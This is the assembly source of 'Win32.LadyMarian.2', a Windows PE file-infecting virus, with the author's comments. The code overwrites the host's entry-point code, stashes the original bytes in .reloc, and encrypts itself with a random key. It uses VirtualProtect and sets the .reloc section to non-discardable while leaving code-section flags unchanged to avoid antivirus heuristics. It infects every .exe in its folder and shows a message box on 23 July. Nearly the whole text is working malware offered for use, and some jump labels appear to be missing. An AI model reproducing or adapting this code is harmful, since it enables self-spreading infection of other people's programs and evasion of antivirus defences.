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; Win32.LadyMarian.2
; Coded By ValleZ.
; Size: 848h bytes.
; This is my second virus and probably virus had not optimized code,or bad ideas,or
; other things,but,as i said,its my second so im excused :P if its a lame virus.
; Well,i thing this is a interesting virus becoz it infect with a method that i hadnt seen
; before(however i dont say it no exist,but i havent seen it). Virus overwrite code
; of host,over entry point,after it has copy host code in .reloc.When it returns to host
; it copy again host to entry point and jmp there.Virus place return to host rutine in
; imagebase + 26h, in word oeminfo and 5 * dword reserved.
; Virus is encrypted with random key.
; Virus no change flags of code section where it overwrite code of host becoz avs heuristic
; could detect it. It use VirtualProtect api to set his memory as writable.
; I want to include some antidebug rutines in virus code but finally i think better not
; becoz size of virus is 848h bytes...and if it grow up very much probably it cannot infect
; any file becoz it will be more big than reloc.
; Virus doesnt increase size of file and no change entry point.
; It places his own SEH and test files with SfcIsFileProtected api when sfc.dll exists.
; It infects all files in his folder that can be infected.
; In NT machines only infect if it has necesary permission.
; In header it only change: ImageBase + 26h to ImageBase + 3ch,with code to return host.
; Byte 1 of TimeDateStamp in PEheader + 08h.
; Flags of .reloc to do it not discarcheable.
; Payload: show a message box with no button :P close it with ctrl + alt + supr
; No more things.
; This virus is for Lady Mariam,the best girl in the world.
; Thx:
; Xezaw,my m3nt0r who shows me all i know :)
; mscorlib,thx for that help that u gave me :) u r a genius :D
; GriYo,thx u too for ur help too :)
; Sorry,my english is very bad so plz,excuse me.
.model flat,stdcall
extrn ExitProcess:proc
sizeVir = endVir - startVir
sizecrypt = decryptz - retHost
db 0
push ebx ;registers preserved too
push ecx
push edx
push esi
push edi
push ebp
call d_offset ;delta offset
pop ebp
sub EBP,offset d_offset
jmp decryptz
mov esp,00000000h
pop dword ptr fs:[0] ;SEH return
pop ebp
pop ebp ;ebp too was saved,so we can restore it
lea eax,[ebp + offset baseCalc]
xor al,al
xor ecx,ecx
mov cx,100h
add eax,ecx
sub eax,ecx
cmp word ptr [eax],'ZM' ;search for image base
jne baseCalc
mov esi,[eax + 1ch] ;dir of reloc
add esi,eax ;this header dword is modified
;when file is infected
mov ecx, [eax+3Ch]
add ecx, eax
mov dx,[ecx + 8]
cmp dx,'vz' ;test if this is a infected file,
jne Exit ;second generation,i no test it with
;or ebp,ebp becoz
;with this infection method
;sometimes ebp = 0 in 2<> gen.
lea edi,[ebp + startVir]
add eax,26h ;goto return code in image base + 26h
jmp eax
push 0
call ExitProcess
;return host code.It is put in dos
;header 5 reserved dwords + oeminfo.
mov eax,edi
mov ecx,sizeVir + 1
again1: rep movsb ;copy host code in entry point direction
jcxz next1 ;to recover the host body and
loop again1 ;next jmp to entry point and begin
next1: ;execution of host.
pop ebp
pop edi
pop esi ;i think some programs fails if not preserve
pop edx
pop ecx
pop ebx
jmp eax
xor edx,edx ;small fix :P
mov [ebp + SfcIsFileProtectedz],edx ;sometimes fault becoz
;thought it has sfc api
;my SetWritrableCode rutine is prepared for with a few
;changes can search a api directly from export.
;really,rutine search VirtualProtect for
;change virus pages to readable,writable and executable
;but putting GetProcAddress offset in repuse + 2 and
;putting a ret in a good site rutine will search
;GetProcAddress and we not spend bytes in repeat code ;)
mov eax,offset GPA
mov dword ptr [ebp + repuse + 2],eax
mov ax,0c35bh ;pop ebx,ret
mov word ptr [ebp + repuse2],ax
lea eax,[ebp + SetWritableCode]
call eax
;of course after use rutine for our propose
;we must rewrite good offset of VP and good code
;where we write ret becoz when infect next generation
;file the code of rutine must be the first
lea ebx,[ebp + offset VP]
mov dword ptr [ebp + repuse + 2],ebx
mov cx,6a54h
mov word ptr [ebp + repuse2],cx
mov edi,[ebp + kern]
mov [EBP + offset GetProcAddressz],EAX
;we have GetProcAddress,we can be happy! We can get all apis we need and
;we can start to infect files ;)
;next code calc apis
;In data apis must be in this form:
;api1kernel 0 api2kernel 0 ... apiNkernel 00 Library1nxt 0 api1nxtLib 0 api2nxtLib 0
;... apiNnxtLib 00 ... LibreriaNnxt 000
;00 is change of library and 000 is finish of apis
lea ESI,[EBP + offset ApisNames]
mov ebx,edi
mov ECX,[EBP + offset GetProcAddressz]
lea EDX,[EBP + offset dirApis]
push EDX
push ESI
push ebx
mov edx,[ebp + GetProcAddressz]
call edx
pop EDX
mov [EDX],EAX
add EDX,4h
inc ESI
mov AL,byte ptr[ESI]
or AL,AL
jnz searchApis
inc ESI
mov AL,byte ptr[ESI]
or AL,al
jnz nextAPI
inc ESI
mov AL,byte ptr[ESI]
or AL,al
jz allApisFounds
push EDX
cmp ebx,[EBP + offset kern]
je IsKern
IsKern: push ESI
mov eax,dword ptr [ebp + offset LoadLibraryAz]
call eax
or eax,eax ;por la sfc.dll en 9x
jz allApisButSfcNot
pop EDX
jmp searchApis
pop edx
SEH: ;set SEH for me,save ebp too
push ebp
lea eax,[ebp + retHost]
push eax
mov eax,fs:[0]
push eax
mov fs:[0],esp
mov dword ptr[ebp + offset SEHout + 1],esp
;payload only show a message box if 23-7-XX,but when i had a moment ill put some payload
;a few more original :P
Payload: ;payload (only 9x)
mov eax,dword ptr [ebp + offset GetVersionz]
call eax
test EAX,08000000h
jnz FirstFile
lea ESI, [EBP + offset SystemTime]
push ESI
mov eax,[EBP + offset GetSystemTimez]
call eax
cmp [ESI.ST_wMonth],7
jne FirstFile
cmp [ESI.ST_wDay],23
jne FirstFile
lea eax,[ebp + pay]
lea esi,[ebp + paytit]
push 07h
push esi
push eax
push 0
mov eax,dword ptr [ebp + offset MessageBoxAz]
call eax
FirstFile: ;infect all .exe in his folder that could infect
lea eax,[ebp + offset files]
lea ESI,[ebp + offset WIN32_FIND_DATA]
push ESI
push EAX
mov eax,dword ptr [ebp + offset FindFirstFileAz]
call eax
inc eax
jz retHost
dec eax
mov [ebp + handFile],eax
jmp infection
push dword ptr [ebp+WFD_dwFileAttributes]
lea eax, [ebp + WFD_szFileName]
push eax
mov eax,dword ptr [ebp + offset SetFileAttributesAz]
call eax
lea ESI,[ebp + offset WIN32_FIND_DATA]
mov eax,[ebp + handFile]
push esi
push eax
mov eax, dword ptr [ebp + offset FindNextFileAz]
call eax
or eax,eax
jz retHost
lea edi,[ebp + offset WFD_szFileName]
mov eax,dword ptr [ebp + offset GetVersionz]
call eax
test EAX,08000000h
jz _9x
;in NT only infect if have permiss
mov eax,[ebp + offset WFD_dwFileAttributes]
test eax,1915h
jnz NextFile
_9x: ;sfp?? i test it for NT and 9x becoz i have listened
;millenium have it too,true?
push edi
push 0
mov eax,[ebp + SfcIsFileProtectedz]
or eax,eax
jz nosfc
call eax
or eax,eax
jnz NextFile
;next part is tipycal file mapping
push 80h
push edi
mov eax, dword ptr[ebp + offset SetFileAttributesAz]
call eax
xor eax,eax
push eax
push eax
push 3
push eax
inc eax
push eax
push 0C0000000h
push edi
mov eax,dword ptr [ebp + offset CreateFileAz]
call eax
inc eax
or eax,eax
jz Closed
dec eax
mov [ebp + offset CreateFileHand],eax
xor ebx,ebx
push ebx
push dword ptr[ebp+ offset WFD_nFileSizeLow]
push ebx
push 4
push ebx
push eax
mov eax, dword ptr [ebp + offset CreateFileMappingAz]
call eax
or eax,eax
jz CloseFile
mov [ebp + offset CreateFileMappingHand],eax
push dword ptr[ebp + offset WFD_nFileSizeLow]
xor ebx,ebx
push ebx
push ebx
push 000F001Fh
push eax
mov eax, dword ptr [ebp + offset MapViewOfFilez]
call eax
or eax,eax
jz CloseMapping
mov [ebp + offset MapViewOfFileHand],eax
mov edi,eax
cmp word ptr [edi],'ZM' ;test if PE file
jne CloseView
cmp word ptr[edi + 8],4
jne CloseView
mov esi,[edi + 3ch]
add esi,edi
cmp word ptr[esi],'EP'
jne CloseView
mov ax,[esi + 8] ;not infected yet??
cmp ax,'vz'
je CloseView
mov eax,[esi + 28h]
xor ebx,ebx
mov bx,word ptr[esi + 14h]
add ebx,18h
add ebx,esi
push ebx
mov ecx,dword ptr[ebx + 0ch]
add ecx,dword ptr[ebx + 10h] ;search for entryPoint section,
cmp eax,ecx ;the section where is entryPoint.
jb EntrySection
add ebx,28h
jmp BuscaEntrySec
mov edx,[esi + 28h]
sub edx,[ebx + 0ch]
add edx,[ebx + 14h] ;offset of Epoint in file.No RVA.
add edx,edi
;AddressOfEntryPoint - VAsection + PointerToRawData
mov [ebp + offset EntryPointInFile],edx
sub ecx,eax ;SectionEnd - entryPoint
mov eax,sizeVir
cmp ecx,eax
jb nxt ;enought size for put virus?
jmp nonxt
pop ebx
jmp CloseView
mov ecx,eax
pop ebx
push ecx
mov cx,[esi + 6]
sub ebx,28h
inc cx
dec cx ;searching for reloc
or cx,cx
jz nxt2
jmp nonxt2
pop ecx ;no .reloc
jmp CloseView
add ebx,28h ;is this section .reloc?? compare...
lea eax,[ebp + offset reloc]
push ebx
push eax
lea eax,[ebp + offset compara]
call eax
pop edx
pop edx
or eax,eax
jne buscaReloc
pop ecx
cmp dword ptr [ebx + 10h],ecx
;enought space in reloc for virus?
jb CloseView
push ebx
push esi
mov eax,dword ptr [ebx + 0ch]
mov [edi + 1ch],eax ;reloc dir for nxt gen
mov ebx,[ebx + 14h] ;go start .reloc
add ebx,edi
;copy return to host code to imagebase + 26h,overwriting oeminfo and next 5 reverved word.
;returnHost is 22 bytes, word oeminfo + 5 * dword reserveds ;)
add edi,26h
lea esi,[ebp + offset ReturnHost]
tamReturn = ReturnHost_ - ReturnHost
xor ecx,ecx
mov cl,tamReturn
again2: rep movsb ;copying...
jcxz next2
loop again2
CopyReloc: mov esi,[ebp + offset EntryPointInFile]
mov edi,ebx
mov ecx,sizeVir+1 ;copy host in reloc for recover later...
again3: rep movsb
jcxz next3
loop again3
lea esi,[ebp + offset startVir]
mov edi,[ebp + offset EntryPointInFile]
mov eax,edi
mov ecx,sizeVir ;copying...
again4: rep movsb ;overwriting host with virus >:D
jcxz next4
loop again4
sizedecrypt = endVir - decryptz
sub edi,sizedecrypt
mov ecx,sizecrypt
mov eax,[ebp + GetTickCountz]
call eax
dec edi ;crypt byte to byte with random key
xor byte ptr[edi],al
loop cryptaz
pop esi
pop ebx
mov dword ptr [ebx + 24h],40000040h
;reloc not discarchable!!
;i think avs no see this flag ;)
mov ax,'vz'
mov [esi + 8],ax
push dword ptr[ebp + offset MapViewOfFileHand]
mov eax, dword ptr [ebp + offset UnmapViewOfFilez]
call eax
push dword ptr[ebp + offset CreateFileMappingHand]
mov eax,dword ptr[ebp + offset CloseHandlez]
call eax
push dword ptr[ebp + offset CreateFileHand]
mov eax, dword ptr[ebp + offset CloseHandlez]
call eax
jmp NextFile
kernel32_ db 'Kernel32',0
reloc db '.reloc',0
GPA db 'GetProcAddress',0
files db '*.exe',0
pay db 'This virus is for you,for Lady Marian.',0dh
db ' You are the only girl in the world',0dh
db 'whose i have in loved and never other girl',0dh
db ' could be in my heart so you have been.',0dh
paytit db ' i will not forget you...',0
db 'LoadLibraryA',0
db 'GetSystemTime',0
db 'CreateFileA',0
db 'CreateFileMappingA',0
db 'MapViewOfFile',0
db 'CloseHandle',0
db 'UnmapViewOfFile',0
db 'FindFirstFileA',0
db 'FindNextFileA',0
db 'GetTickCount',0
db 'GetVersion',0
db 'SetFileAttributesA',0
db 'ExitProcess',0
db 0
db 'User32',0
db 'MessageBoxA',0
db 0
db 'sfc',0
db 'SfcIsFileProtected',0
finAPIS dw 00h
LoadLibraryAz dd 0
GetSystemTimez dd 0
CreateFileAz dd 0
CreateFileMappingAz dd 0
MapViewOfFilez dd 0
CloseHandlez dd 0
UnmapViewOfFilez dd 0
FindFirstFileAz dd 0
FindNextFileAz dd 0
GetTickCountz dd 0
GetVersionz dd 0
SetFileAttributesAz dd 0
ExitProcessz dd 0
MessageBoxAz dd 0
SfcIsFileProtectedz dd 0
CreateFileHand dd 0
CreateFileMappingHand dd 0
MapViewOfFileHand dd 0
EntryPointInFile dd 0
handFile dd 0
GetProcAddressz dd 0
Max_Path equ 260
FT_dwLowDateTime dd ?
FT_dwHighDateTime dd ?
WIN32_FIND_DATA label byte
WFD_dwFileAttributes dd ?
WFD_ftCreationTime FILETIME ?
WFD_ftLastAccessTime FILETIME ?
WFD_ftLastWriteTime FILETIME ?
WFD_nFileSizeHigh dd ?
WFD_nFileSizeLow dd ?
WFD_dwReserved0 dd ?
WFD_dwReserved1 dd ?
WFD_szFileName db Max_Path dup (?)
WFD_szAlternateFileName db 13 dup (?)
db 03 dup (?)
ST_wYear dw ?
ST_wMonth dw ?
ST_wDayOfWeek dw ?
ST_wDay dw ?
ST_wHour dw ?
ST_wMinute dw ?
ST_wSecond dw ?
ST_wMilliseconds dw ?
call SetWritableCode
cmp byte ptr [ebp + offset retHost],0BCh ;encrypted??
je vir ;if no encryted jmp code
xor ecx,ecx
dec ecx
mov al,byte ptr [ebp + retHost]
;search the encryption key
xor al,cl
sub al,0bch
jz keyfound
loop whatkey
mov dl,cl
lea esi,[ebp + offset retHost]
mov edi,esi
mov ecx,sizecrypt
db 0d6h ;setalc,undocumented,antiheuristic,is good today???
xor al,dl
loop decrypt
jmp vir
;SetWritableCode rutine searchs VirtualProtect in kernel export table for calling it
;later and do writable virus code memory zone.Why? Virus code is on code section
;and if code section flags say writable section,avs will see it and will advise
;user that infect file is a posible virus :S so we no set that flag and avs will be
;in silent :)
;In addition with a few modifications explanated and do up,this rutine will search
;getProcAddress so we dont spend bytes in repeat code ;)
mov EAX,[ESP + 28]
xor AX,AX
mov edx,1000h
add eax,edx
sub eax,edx
mov CX,word ptr[EAX]
cmp CX, 'ZM'
jne VPsearch_kernel
mov edi,eax
mov EAX,[EAX + 3Ch] ;PE
add EAX,edi
mov EAX,[EAX + 78h] ;Dir entrys
add EAX,edi ;export table
push eax
mov ECX,[EAX + 20h] ;exported func names
add ECX,edi
mov EBX,[ECX]
add EBX,edi
PUSH EBX ;search GetProcAddress
lea EBX,[EBP + offset VP]
lea ebx,[ebp + offset compara]
call ebx
or EAX,eax
jz VPfinality
add ECX,4
inc edx
inc edx
jmp VPrepeat ;edx index ordinal
mov EAX,[esp]
mov EAX,[EAX + 24h]
add EAX,edi ;eax -> ordinal
add EAX,EDX ;add index
mov EAX,[EAX] ;index for export address table
shr EAX,10h
dec EAX
mov EBX,[esp]
mov EBX,[EBX + 1ch] ;array of dirs of func
add EBX,edi ;we index it in eax
mov EAX,[EAX] ;dir of VirtualProtect
add EAX,edi
push esp ;lpflOldProtect is a stack dword
push 40h ;writable,readable and executable
push sizeVir ;size of memory to put writable
lea ebx,[ebp + startVir]
push ebx
call eax
pop eax
mov [ebp + kern],edi
;this useful ritune compare 2 strings and return 0 if they are identical and 1 if not.
push ECX
push ESI
push edi
mov ESI,[ESP + 20]
mov EDI,[ESP + 16]
mov ecx,esi
lodsb ;lenght of string
or al,al
jnz endString
sub esi,ecx
xchg esi,ecx ;ecx = lenght esi = start
xor eax,eax
repz cmpsb
je endCompara
inc eax
pop edi
;arrrggghtt!! damn,i have had headache becoz i was using VP string before decrypt it!! ;@
VP db 'VirtualProtect',0
kern dd 0
end start